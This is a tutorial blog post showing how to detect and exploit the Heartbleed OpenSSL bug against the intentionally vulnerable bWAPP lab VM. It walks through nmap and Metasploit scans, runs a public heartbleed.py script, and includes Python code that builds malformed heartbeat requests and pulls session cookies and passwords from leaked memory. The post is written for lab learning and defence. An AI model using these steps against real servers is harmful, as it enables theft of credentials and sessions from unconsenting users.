Heartbleed Discovery and Exploit

Heartbleed is a security bug in the OpenSSL cryptography library, a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014.

Today we will discover how to detect the vulnerability and then demonstrate how to exploit it. The bug (CVE-2014-0160) affects OpenSSL 1.0.1 through 1.0.1f and was fixed in 1.0.1g, so if you are running one of the affected versions, update.


The application we will be exploiting for this example is bWAPP (https://sourceforge.net/projects/bwap…), which we have used in previous tutorials. It is an intentionally vulnerable web application that we will take advantage of.


Once you have installed the bWAPP virtual machine and started it up, the first thing we need is the IP of the web app so we can scan it. In our case it is 192.168.1.105; yours may differ depending on what DHCP assigns.

Once you are logged in, choose Heartbleed Vulnerability from the drop-down menu and press Hack.


This brings us to the Heartbleed vulnerability page on the web app, and right off the bat it gives a hint on how to exploit it: the logon service listens on port 8443, not on the port the web app itself is served from.


We will also use a ready-made attack script for this vulnerability (https://github.com/ctfs/write-ups-201…), so you will need to download the heartbleed.py file from there.


The last thing we need is our attacking machine. For this tutorial we are using ParrotOS (https://parrotlinux.org/).

First we need to run a service scan against the target, so open a terminal and start nmap.

sudo nmap -sV -A 192.168.1.105

This will tell us that port 8443 is open and what service is listening on it. While that is scanning, let's open port 8443 in our web browser. In our case the URL is the following.

https://192.168.1.105:8443


Once that opens we can take a look at the SSL certificate the page is serving.


As we can see the certificate is not trusted, so the browser flags the connection as not secure. That warning on its own does not prove Heartbleed is present (an untrusted certificate and a leaky OpenSSL are separate problems), so we test for the bug directly. Again we will use nmap, this time with its ssl-heartbleed NSE script.

sudo nmap -p 8443 --script ssl-heartbleed 192.168.1.105

The -p flag sets the port number, and --script selects the NSE script that checks whether the service is vulnerable to Heartbleed.


The nmap scan reveals that the service is indeed vulnerable to Heartbleed and that the risk factor is High. It also reports the OpenSSL version, 1.0.1, which falls in the affected range we mentioned earlier.

To exploit this vulnerability we will need to start Metasploit.

msfconsole


Once the console has started we can set some parameters. First let's search for the OpenSSL Heartbleed module.

search openssl_heartbleed


So this is the module we will be using. So next we need to tell Metasploit to use this module for our exploit.


use auxiliary/scanner/ssl/openssl_heartbleed


Next we need to set some parameters. As we can see above, RHOSTS has no value, so we give it the IP of the target (the bWAPP machine, not our attacking box). RPORT defaults to 443, so we need to change it to 8443.

set RHOSTS 192.168.1.105

set RPORT 8443

show options

The show options command lists the module's settings so we can confirm everything is set up correctly.


Next we are going to run a vulnerability scan from within the Metasploit framework.

set action SCAN

run


This also confirms that the server is vulnerable to this exploit, perfect. As an attacker it is always worth confirming a finding with a second tool before acting on it, to cement our suspicions.


Next we want to run our heartbleed.py script against the web app. It sends a malformed TLS heartbeat request and prints a hex dump of whatever server memory comes back in the response. Check the script's usage text for how to set the port, since our target listens on 8443 rather than the default 443.

python ./heartbleed.py 192.168.1.105


As we can see, the leaked memory contains logon details for a user and also the PHP session cookie, both of which were sitting in the server's process memory from an earlier request. Despite the look of the dump, the bug is named after the TLS Heartbeat extension it lives in: the server "bleeds" memory through heartbeat responses.
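Both the nmap ssl-heartbleed check above and the heartbleed.py dump do the same thing under the hood: send a Heartbeat request whose payload_length field claims far more bytes than were actually sent, then see whether the server echoes back more data than it received. The following Python is an added example written for this post, not code from the page, from nmap or from the linked script; it models the vulnerable OpenSSL 1.0.1 through 1.0.1f handler beside the 1.0.1g fix, applies the client-side verdict, and pulls the session cookie and credentials out of the leak. The heap contents, session ID and the bWAPP default login bee/bug are constructed sample data, and the two server functions are simplified models of OpenSSL's tls1_process_heartbeat rather than its real code.

```python
import re
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for Heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520 requires at least 16 bytes of padding
TLS_1_1 = (3, 2)


def build_heartbeat_request(claimed_len, payload=b""):
    """TLS record carrying a Heartbeat request whose payload_length field
    claims `claimed_len` bytes while only len(payload) bytes are really sent.
    claimed_len == len(payload) gives a well-formed request."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, *TLS_1_1, len(body)) + body


def parse_record(data):
    """Split a TLS record into (content type, version, fragment)."""
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    return ctype, (major, minor), data[5:5 + length]


def _heartbeat_header(record):
    """Return (version, fragment, claimed payload length) for a Heartbeat request."""
    ctype, version, frag = parse_record(record)
    if ctype != TLS_HEARTBEAT or not frag or frag[0] != HB_REQUEST:
        return None
    return version, frag, struct.unpack("!H", frag[1:3])[0]


def vulnerable_heartbeat(record, heap_after_record):
    """Model of OpenSSL 1.0.1 through 1.0.1f: the claimed payload_length is
    trusted and memcpy'd into the response, so the copy runs off the end of
    the record into whatever sits next to it in the heap."""
    parsed = _heartbeat_header(record)
    if parsed is None:
        return None
    version, frag, claimed = parsed
    source = frag[3:] + heap_after_record        # what the memcpy really reads
    body = struct.pack("!BH", HB_RESPONSE, claimed) + source[:claimed] + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, *version, len(body)) + body


def patched_heartbeat(record, heap_after_record):
    """Model of the 1.0.1g fix: drop the request silently if the claimed
    length does not fit inside the record (1 + 2 + payload + 16 > length)."""
    parsed = _heartbeat_header(record)
    if parsed is None:
        return None
    version, frag, claimed = parsed
    if 1 + 2 + claimed + MIN_PADDING > len(frag):
        return None                              # no response at all
    body = struct.pack("!BH", HB_RESPONSE, claimed) + frag[3:3 + claimed] + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, *version, len(body)) + body


def classify_response(response, sent_payload=b""):
    """Client-side verdict: a Heartbeat response carrying more bytes than we
    sent means the server copied from beyond our payload. Returns
    (vulnerable, echoed_bytes)."""
    if response is None:
        return False, b""
    ctype, _, frag = parse_record(response)
    if ctype != TLS_HEARTBEAT or not frag or frag[0] != HB_RESPONSE:
        return False, b""
    echoed = frag[3:]
    return len(echoed) > len(sent_payload) + MIN_PADDING, echoed


def find_secrets(leaked):
    """Pull out what the bWAPP dump on this page showed: the PHP session
    cookie and form-posted credentials."""
    found = {}
    m = re.search(rb"PHPSESSID=([A-Za-z0-9]+)", leaked)
    if m:
        found["PHPSESSID"] = m.group(1).decode()
    m = re.search(rb"login=([^&\s]+)&password=([^&\s]+)", leaked)
    if m:
        found["login"], found["password"] = m.group(1).decode(), m.group(2).decode()
    return found


# Constructed stand-in for the heap next to the record buffer: an earlier
# client's request as it would sit in the server process. Sample data only,
# not from a real capture; bee/bug is bWAPP's documented default login.
SAMPLE_HEAP = (
    b"POST /login.php HTTP/1.1\r\nHost: 192.168.1.105:8443\r\n"
    b"Cookie: PHPSESSID=constructedsessionid1234\r\n\r\n"
    b"login=bee&password=bug&form=submit"
) + b"\x00" * 64


def run_against(server):
    """Send the malformed request to a server model and return the verdict
    plus whatever secrets the leak contained."""
    request = build_heartbeat_request(claimed_len=0x4000, payload=b"")
    vulnerable, leaked = classify_response(server(request, SAMPLE_HEAP))
    return vulnerable, find_secrets(leaked)


if __name__ == "__main__":
    for name, server in (("OpenSSL 1.0.1f model", vulnerable_heartbeat),
                         ("OpenSSL 1.0.1g model", patched_heartbeat)):
        print(name, run_against(server))
```

A well-formed request (claimed_len equal to the real payload) gets the same echo from both models and is classified as not vulnerable, which is why the check must use a mismatched length. Against a live host you would first complete a ClientHello that advertises the heartbeat extension and then send `build_heartbeat_request(0x4000)` over the socket; the classification and secret extraction stay exactly as above.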

Thanks for reading guys and don’t forget to like this post, comment and of course, subscribe for more posts like this!!

QuBits 2020-02-01
